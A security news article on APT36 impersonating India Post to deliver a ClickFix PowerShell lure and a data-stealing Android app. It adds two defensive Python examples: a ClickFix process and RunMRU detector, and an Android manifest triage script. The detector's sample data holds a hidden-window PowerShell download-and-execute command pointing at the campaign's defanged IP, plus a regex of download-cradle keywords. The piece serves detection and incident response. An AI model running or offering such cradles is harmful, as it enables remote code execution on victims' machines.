
An Advanced Persistent Threat (APT) group with ties to Pakistan has been attributed with creating fake websites impersonating India's public sector postal system as part of a campaign designed to infect both Windows and Android users.
Cybersecurity company Cyfirma attributes the campaign to a threat actor tracked as APT36, also known as Transparent Tribe.
The fraudulent website, which mimics India Post, is postindia[.]site. Visitors landing on the site from Windows systems are prompted to download a PDF document, while those accessing it from Android devices are served a malicious application package file (“indiapost.apk”).

“When accessed from the desktop, the site provides malicious PDF files containing the ‘Clickfix’ tactic,” Cyfirma said. “This document tells the user to press Win + R, paste the provided PowerShell command into the Run dialog and run it – it could compromise the system.”
An analysis of the EXIF data associated with the dropped PDF shows that it was created on October 23, 2024, by an author named “PMYLS”. The domain impersonating India Post was registered on November 20, 2024, about a month later.

The PowerShell code is designed to download the next-stage payload from a remote server (88.222.245[.]211) that is currently inactive.
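How a defender would look for the ClickFix chain described above, as an added example that is not part of the article or of Cyfirma's report: the Run dialog is hosted by explorer.exe, so a pasted command shows up as a powershell.exe child of explorer.exe in process-creation telemetry (Sysmon Event ID 1 or Security event 4688), and Windows keeps Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The event records, RunMRU values and indicator regex below are constructed for this example; only the defanged IP address is taken from the article.

```python
"""Toy ClickFix detector (added example; not from the article or Cyfirma).

Two defender-side artifacts follow from the "press Win + R and paste" lure:
  * the Run dialog is hosted by explorer.exe, so the resulting shell has
    explorer.exe as its parent process, and
  * Windows records Run-dialog history under the RunMRU registry key.
Both checks are applied to constructed sample data below.
"""
import re

# Process-creation records shaped like Sysmon Event ID 1 / Security 4688
# fields. All values are constructed; the IP is the article's, defanged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://88.222.245[.]211/x.ps1 -UseBasicParsing)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n'},
]

# Constructed RunMRU values, in the shape of a registry export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows appends "\1" to each stored command; MRUList orders the entries,
# most recent first.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (iwr http://88.222.245[.]211/x.ps1)"\\1',
    "MRUList": "ba",
}

# Download-cradle and hidden-window switches typical of pasted one-liners.
CRADLE = re.compile(
    r"(iex|invoke-expression|downloadstring|iwr|invoke-webrequest|"
    r"curl|wget|-enc\b|-encodedcommand|-w\s+hidden|-windowstyle\s+hidden)",
    re.IGNORECASE)

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def is_clickfix_process(event):
    """True when a shell spawned directly by explorer.exe (the Run dialog's
    host) carries download-cradle or hidden-window indicators."""
    shell = event["Image"].lower().endswith(SHELLS)
    from_explorer = event["ParentImage"].lower().endswith("explorer.exe")
    return shell and from_explorer and bool(CRADLE.search(event["CommandLine"]))


def suspicious_runmru(values):
    """Return (slot, command) pairs from RunMRU, most recent first, whose
    command matches the cradle indicators."""
    hits = []
    for slot in values.get("MRUList", ""):
        cmd = values.get(slot, "")
        if cmd.endswith("\\1"):      # strip the "\1" suffix Windows adds
            cmd = cmd[:-2]
        if CRADLE.search(cmd):
            hits.append((slot, cmd))
    return hits


def scan(events, runmru):
    """Summarise both checks for a host."""
    return {
        "process_hits": sum(1 for e in events if is_clickfix_process(e)),
        "runmru_hits": len(suspicious_runmru(runmru)),
    }


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        if is_clickfix_process(e):
            print("process hit:", e["CommandLine"])
    for slot, cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU slot {slot}:", cmd)
    print(scan(SAMPLE_EVENTS, SAMPLE_RUNMRU))
```

The parent-process check is what separates a pasted ClickFix command from the far more common cmd.exe or scheduler launches of PowerShell; the RunMRU check matters during incident response because the Run-dialog history survives even when the downloaded payload has already been removed.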
Meanwhile, when the same site is accessed from an Android device, it prompts users to install a mobile app for a “better experience.” Once installed, the app requests extensive permissions to harvest and exfiltrate sensitive data, including contact lists, current location, and files from external storage.

“Android apps change their icons to mimic innocuous Google account icons to hide activity, making it difficult for users to find and uninstall the apps when they want to remove them,” the company said. “This app also has the ability to force users to accept permissions if denied on the first instance.”
The malicious app is also designed to keep running in the background after the device is restarted, and it explicitly requests permission to ignore battery optimizations.
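A static triage of an Android manifest for the capability set described in the three paragraphs above (contact, location and storage access; boot persistence; a battery-optimization exemption; a swappable launcher icon), as an added example that is neither Cyfirma's tooling nor the indiapost.apk itself. The manifest and the scoring weights are constructed for the example; the icon-swap heuristic assumes the common implementation of a second launcher activity-alias whose icon and label differ from the main activity's.

```python
"""Static manifest triage (added example; not from the article or Cyfirma).

Input is a decoded AndroidManifest.xml as text (for instance from apktool).
The manifest below is constructed to carry the capabilities the article
describes, so the scoring can be shown end to end.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # android:* attribute prefix

SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.postlookup">
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <application android:label="Post Tracker">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <!-- second launcher entry with a different icon/label: the pattern the
         icon-swap heuristic below looks for -->
    <activity-alias android:name=".AltAlias" android:targetActivity=".MainActivity"
                    android:icon="@drawable/ic_alt" android:label="Google"
                    android:enabled="false" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity-alias>
    <receiver android:name=".BootReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Permissions that let an app read the data classes the article names
# (contacts, location, external storage) plus a few neighbours.
HARVEST_PERMS = {
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.READ_MEDIA_IMAGES",
    "android.permission.READ_SMS",
    "android.permission.READ_CALL_LOG",
}
BOOT_PERM = "android.permission.RECEIVE_BOOT_COMPLETED"
BATTERY_PERM = "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"


def permissions(root):
    return {el.get(A + "name") for el in root.iter("uses-permission")}


def launcher_entries(root):
    """(name, icon, label) for every activity/activity-alias that appears in
    the launcher, i.e. has a MAIN action and a LAUNCHER category."""
    out = []
    for el in root.iter():
        if el.tag not in ("activity", "activity-alias"):
            continue
        actions = {a.get(A + "name") for a in el.iter("action")}
        cats = {c.get(A + "name") for c in el.iter("category")}
        if "android.intent.action.MAIN" in actions and \
                "android.intent.category.LAUNCHER" in cats:
            out.append((el.get(A + "name"), el.get(A + "icon"), el.get(A + "label")))
    return out


def triage(manifest_xml):
    """Score the manifest; weights are constructed for this example."""
    root = ET.fromstring(manifest_xml)
    perms = permissions(root)
    actions = {el.get(A + "name") for el in root.iter("action")}
    entries = launcher_entries(root)
    harvest = sorted(perms & HARVEST_PERMS)
    boot = BOOT_PERM in perms and "android.intent.action.BOOT_COMPLETED" in actions
    battery = BATTERY_PERM in perms
    # Two launcher entries with different icon/label pairs allow the visible
    # identity to be switched after install.
    icon_swap = len({(icon, label) for _, icon, label in entries}) >= 2
    return {
        "harvest": harvest,
        "boot_persistence": boot,
        "battery_exemption": battery,
        "icon_swap": icon_swap,
        "launcher_entries": entries,
        "score": len(harvest) + int(boot) + int(battery) + 2 * int(icon_swap),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

None of these signals is malicious on its own; a legitimate tracking app may ask for location, and some utilities request the battery exemption. The combination of broad data access, a boot receiver, the battery exemption and a disabled alternate launcher identity is what makes a sample worth a closer dynamic look.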
“Clickfix is increasingly being exploited by cybercriminals, fraudsters and APT groups, as reported by other researchers observing its use in the wild,” Cyfirma said. “This new tactic poses a serious threat because it can target both unsuspecting and tech-savvy users who may not be familiar with such methods.”